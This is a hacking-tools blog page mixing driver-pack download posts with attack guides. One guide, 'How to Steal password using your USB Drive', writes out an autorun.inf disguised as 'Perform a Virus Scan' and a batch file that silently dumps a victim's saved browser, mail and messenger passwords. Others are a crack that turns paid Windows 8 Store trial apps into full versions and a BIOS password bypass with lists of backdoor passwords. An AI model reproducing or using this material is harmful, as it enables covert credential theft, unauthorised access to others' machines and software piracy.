Showing posts with label Drivers and Hacking tools for PC. Show all posts
Showing posts with label Drivers and Hacking tools for PC. Show all posts

Sunday 12 January 2014

Driver Pack Solution 11 (x32-x64)

Driver Pack Solution 11 (x32-x64):

Driver Pack Solution is the most popular program that makes the job of finding and automatically installing drivers a pleasure.Driver Pack Solution simplifies the process of re-installing Windows on any computer. No more problems with searching and installing drivers. Everything will be done in as!

How to instal:

1

launch driverpack solution.

Insert the DriverPack Solution disk
Or amount iso file.

2make just a couple of clicks!

Drivers installation with DriverPack Solution

3in 3 to 5 minutes all required drivers will be installed on your computer.


All drivers have been installed

Download :

Get Torrent File Here

AMD Driver Autodetect Utility

AMD Driver Autodetect Utility


Description:



AMD Driver Autodetect detects your graphics card and operating system and tells you if a new driver is available. If there is a new driver, the tool will download it with a click of a button and start the installation process.
http://www2.ati.com/drivers/auto/amddriverdownloader.exe

Friday 2 August 2013

Make Your Windows 8 Trial Apps Registerd (appcrack)


                               
Trial applications downloaded from the Windows 8 Store can be easily converted to full paid versions by applying a so called ’sideload crack’. The tool has been around best tool for activating windows 8 paid apps and has appeared on a Russian website dealing with Windows 8 piracy.  Besides making applications free, the tool also makes it possible to install Metro applications without using the Windows 8 Store. It’s only possible to ‘crack’ software that has a trial version. In order to convert an application, the trial version needs to be downloaded from the Windows Store.It is a nice  Tool that converts Windows 8 Store trial apps to full paid version – for free for ever...
How to Crack Your Windows 8 Trial Apps

How to Proceed:

  • Install wscrack_32 or wscrack_64 depending on your Windows OS version – x86 or x64.
  • Install trial app store.
  • Enter wscrack_anycpu \ TokensExtractor.exe
  • Now click on “Brute Force tokens.dat”
  • Locate your product and click “CrackIt!” (bottom of the list is mostly “…………. (Trial)”)
  • App is now full license.


Run application  and see if it is unlocked or not and enjoy..

Please Note : Not all apps have a trial version but most do! Disable your antivirus first….


Friday 22 February 2013

How to Steal password using your USB Drive



usb password stealer

Step 1:

Your Antivirus Must be Disable while you are creating USB Sniffer.

Step 2:

Creating your own RootKIT to sniff passwords from Computers required some tools. Following Tools are used to create RootKIT.
Mail Passview
IE Passview
MessenPass
Password Fox
Protected Storage Passview 

Step 3:



After Downloading all the Tools you just have to copy mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exeinto your USB drive.
Step 4:


Open Notepad and Copy following TEXT in it.


.
" [autorun]open=launch.bat ACTION= Perform a Virus Scan "


Save the notepad as autorun.inf on your USB Drive.

Step 5:


Now again open notepad & type


. "start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt " .

Save notepad as Launch.bat this time on your USB Drive.

Step 6:

To check whether it’s working, first try it on your own PC. Insert USB then AutoRUN Pop-up appears.

Step 7:

Click on Perform VIRUS Scan & that’s it. Passwords saved in your PC will be saved in your USB Drive.

Friday 4 January 2013

How to Bypass or Break a BIOS Password


by Galaxysoftwares         

A BIOS password is a protection measure that can be used to stop someone powering up a computer system or making changes in some of the computers most sensitive areas. Many big name computer manufacturers such as Dell and HP lock the customers out of this area because they don’t want the customer changing anything and potentially damaging the machine (which the manufacturer may have to warranty). However, when someone like a computer technician or hardware enthusiast needs to make some hardware changes to the computer, they will need to access the BIOS. Here are some methods to bypass or remove a BIOS password.

NOTE: Do not try to guess the password on a passworded Hard Drive. 3 wrong guesses will often result in the information on the hard drive being lost forever.
How to Bypass or Remove a BIOS Password by Removing the CMOS Battery:
The simplest way to remove a BIOS password is to simply remove the CMOS battery. A computer will remember its settings and keep the time even when it is turned off and unplugged because these parts are powered by small battery inside the computer called a CMOS battery. If we pull out this battery, the computer will forget alot of its hardware settings, including its BIOS password. This should not be performed on Laptops if you are not experienced working with laptop hardware.
Finding the CMOS BatteryAnyway, open up the computer case using a screw driver and locate the flat, circular and metallic CMOS battery. It should look something like the picture to the right. Some computers have this part standing upright.
Once you have located it, observe how the latches are holding it. There are many different ways to remove a CMOS battery but the most common way on newer computers can be seen in the picture below.
Removing the CMOS Battery
Make sure to power down the computer, unplug the power cables and unplug any USB devices if they are powered. The computer must not be able to get power from anywhere for this to work. Take out the CMOS battery and wait 10 – 25 minutes before putting it back in. The reason for this wait is because the computer can still store power in its capacitors even though everything is unplugged. The waiting period allows enough time for them to discharge.
Plug everything back in, power up the computer and enter the BIOS again. If everything went well there should be no more password. In some cases, if you get weird error messages during bootup now, you will need to goto “Load BIOS Defaults” in BIOS and save the changes to fix them.
If this method didn’t work, try one of the methods below.
How to Bypass or Remove a BIOS Password using Software:
!BIOS is a freeware utility which is designed to be a whole BIOS and security suite. It has the ability to decrypt the passwords used in some of the most common BIOS makes such as Award, Phoenix, American Megatrends, IMB etc..
It also has the ability to brute force the password (known as “blasters”). However, this method is dangerous and can result in some unexpected and unwanted results.
Note: Because of this applications password cracking abilities, some antivirus software may report it as a virus/trojan. This is a false positive.
To start using !BIOS, reboot your computer and take note of the BIOS type and version you are running. For example, If your motherboard uses Award BIOS you should look for the text “Award Medallion BIOS 6.0″ or something similar.
Download !BIOS from here and save it to your desktop. Then, open a DOS command windows by going toStart > Run and type: cmd
Once you see a black screen in front of you, type: cd desktop
You should now see something like: C:\Documents and Settings\YourUserName\Desktop>
Now type the name of the file you just downloaded, if you haven’t changed the name just type in: bios320.exe
!BIOS - Decrypting a BIOS Password
Use the down arrow and choose “Crackers” and then press the right arrow. Using the up and down arrows, select the BIOS that the motherboard is using and press Enter.
You should now see a menu asking what you want to crack, in most cases its the Supervisor or System Passwords you want to crack, so press the 1 key on your keyboard. It will then show you another menu asking how you want it to be cracked. Option 1 is pretty good so try that first by pressing the 1 key on your keyboard. You should now have your BIOS password.
Reboot the computer, enter the BIOS and try it out.
How to Bypass or Remove a BIOS Password using the manufacturer backdoor password:
On many computers (especially old ones), computer manufacturers build in backdoor passwords for their own technicians to use so they can access the BIOS when the hardware is being serviced. Here are some of the ones that have been reported. You may need to try quite a few passwords before you find one that works
These passwords are CaSe SeNsItIve.


AMI BIOS Backdoor Passwords:
  • A.M.I.
  • AAAMMMII
  • AMI
  • AMI?SW
  • AMI_SW
  • BIOS
  • CONDO
  • HEWITT RAND
  • LKWPETER
  • MI
  • Oder
  • PASSWORD
Award BIOS Backdoor Passwords:
  • (eight spaces)
  • 01322222
  • 589589
  • 589721
  • 595595
  • 598598
  • ALFAROME
  • ALLY
  • ALLy
  • aLLY
  • aLLy
  • aPAf
  • award
  • AWARD PW
  • AWARD SW
  • AWARD?SW
  • AWARD_PW
  • AWARD_SW
  • AWKWARD
  • awkward
  • IOSTAR
  • CONCAT
  • CONDO
  • Condo
  • condo
  • d8on
  • djonet
  • HLT
  • J256
  • J262
  • j262
  • j322
  • j332
  • J64
  • KDD
  • LKWPETER
  • Lkwpeter
  • PINT
  • pint
  • SER
  • SKY_FOXSYXZ
  • SKY_FOX
  • syxz
  • SYXZ
  • TTPTHA
  • ZAAAADA
  • ZAAADA
  • ZBAAACA
  • ZJAAADC
  • Russian Award BIOS Passwords:
  • %øåñòü ïpîáåëîâ%
  • %äåâÿòü ïpîáåëîâ%
Phoenix Backdoor BIOS Passwords:
  • BIOS
  • CMOS
  • phoenix
  • PHOENIX
Other Manufcaturers Backdoor Passwords: (manufacturer name – password)
  • VOBIS and IBM – merlin
  • Dell – Dell
  • Biostar – Biostar
  • Compaq – Compaq
  • Enox – xo11nE
  • Epox – central
  • Freetech – Posterie
  • IWill – iwill
  • Jetway – spooml
  • Packard Bell – bell9
  • QDI – QDI
  • Siemens – SKY_FOX
  • SOYO – SY_MB
  • TMC – BIGO
  • Toshiba – Toshiba

Tuesday 18 December 2012

COBRA DRIVER PACK 2012 FULL VERSION FREE DOWNLOAD

COBRA DRIVER PACK 2012
Cobra Driver Pack 2010 is All In One Driver for Windows 7/XP/Vista. This driver is suitable for which a computer technician with a Cobra Driver Pack all versions of hardware drivers for Windows XP, Windows Vista and Windows 7 will be met. For a long version of a computer usually do not have the CD driver for mainboard / motherboard luggage such as chipset, DirectX, LAN, Sound, USB, VGA (Graphics Card), etc.